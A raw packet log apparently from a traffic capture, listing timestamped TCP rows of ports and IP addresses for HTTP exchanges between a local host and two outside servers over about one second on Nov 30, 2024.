Nov 30, 2024 04:06:54.831056118 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.831065893 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.831108093 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.831341982 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.831388950 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.831401110 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.832482100 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.832582951 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.832602978 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.833564043 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.833642006 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.833677053 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.834669113 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.834711075 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.834754944 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.835839033 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.835885048 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.835890055 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.836909056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.837016106 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.838021994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.838136911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.839132071 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.839215994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.840238094 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.840368032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.841181993 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.841331959 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.841449976 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.841573000 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.841598034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.841609955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.842125893 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.842201948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.842447042 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.842495918 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.843205929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.843559980 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.843569994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.843588114 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.843720913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.844683886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.844738960 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.844749928 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.844875097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.845805883 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.845853090 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.845864058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.845968962 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.846889973 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.846945047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.846956015 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.847074032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.847995043 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.848057032 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.848067045 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.848174095 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.849030972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.849113941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.849126101 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.849216938 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.850126982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.850234032 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.850244045 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.850322962 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.851212025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.851361036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.851372004 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.851419926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.852335930 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.852466106 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.852475882 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.852551937 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.853398085 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.853498936 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.853586912 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.853596926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.854484081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.854626894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.854676008 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.854687929 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.855575085 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.855681896 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.855801105 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.855899096 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.856679916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.856782913 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.856789112 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.856800079 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.856928110 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.856939077 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.856965065 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.856969118 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.857001066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.857006073 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.857088089 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.857090950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.857122898 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.857125044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.857150078 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.857152939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.857188940 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.857191086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.857728958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.857856035 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.857984066 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.857985973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.858084917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.858531952 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.858841896 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.858897924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.858947039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.858993053 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.859112978 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.859158993 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.859306097 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.859921932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.859966993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.860024929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.860070944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.860210896 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.860256910 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.860311985 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.861011982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.861083031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.861099958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.861146927 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.861315012 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.861360073 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.861442089 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.862099886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.862145901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.862191916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.862236977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.862428904 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.862471104 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.862545013 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.863188028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.863229990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.863281965 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.863360882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.863533020 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.863579988 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.863616943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.864291906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.864339113 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.864476919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.864516020 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.864669085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.864713907 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.864798069 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.865354061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.865396023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.865461111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.865504026 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.865750074 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.865792990 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.865858078 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.866450071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.866556883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.866602898 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.866744041 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.866878033 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.866961956 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.866985083 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.867527008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.867573977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.867635965 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.867681026 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.868001938 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.868047953 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.868108988 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.868611097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.868658066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.868746042 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.868792057 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.869115114 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.869162083 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.869200945 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.869765043 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.869833946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.869951963 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.870219946 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.870266914 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.870310068 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.870779991 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.870841980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.870857954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.870949984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.871324062 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.871366978 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.871478081 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.871876955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.871923923 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.872076988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.872122049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.872430086 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.872567892 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.872766018 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.872951984 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.872996092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.873081923 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.873198986 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.873534918 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.873598099 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.873630047 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.874038935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.874088049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.874135017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.874182940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.874631882 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.874681950 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.874747038 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.875147104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.875188112 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.875260115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.875304937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.875757933 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.875803947 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.875868082 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.876236916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.876281023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.876355886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.876411915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.876863956 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.876909971 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.876998901 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.877316952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.877360106 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.877418041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.877465963 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.877983093 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.878026009 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.878082037 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.878406048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.878454924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.878503084 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.878547907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.879100084 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.879143953 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.879184961 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.879498959 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.879626989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.879657984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.879811049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.880208015 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.880317926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.880378962 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.880563021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.880611897 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.880675077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.880722046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.881308079 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.881352901 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.881364107 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.881648064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.881692886 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.881757975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.881802082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.882415056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.882456064 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.882519007 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.882739067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.882781982 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.882842064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.882886887 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.883539915 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.883589983 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.883621931 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.883816004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.883862019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.883934021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.883977890 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.884644032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.884687901 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.884820938 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.884933949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.884943008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.884982109 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.885710001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.885754108 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.885991096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.886092901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.886101961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.886156082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.887084961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.887130022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.887192011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.887236118 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.888166904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.888209105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.888283014 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.888324022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.889281034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.889327049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.889393091 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.889437914 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.890347958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.890400887 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.890469074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.890513897 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.891436100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.891494989 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.891530037 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.891575098 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.892518997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.892558098 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.892630100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.892678022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.893618107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.893662930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.893711090 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.893755913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.894685984 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.894732952 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.894795895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.894841909 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.895793915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.895844936 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.895911932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.895958900 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.896866083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.896914005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.896956921 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.897001028 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.897963047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.898008108 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.898030996 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.898077965 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.005897999 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.005969048 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.006462097 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.006573915 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.007508039 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.007546902 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.007642984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.007761955 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.008658886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.032150984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:55.032201052 CET	49894	80	192.168.2.4	185.215.113.16
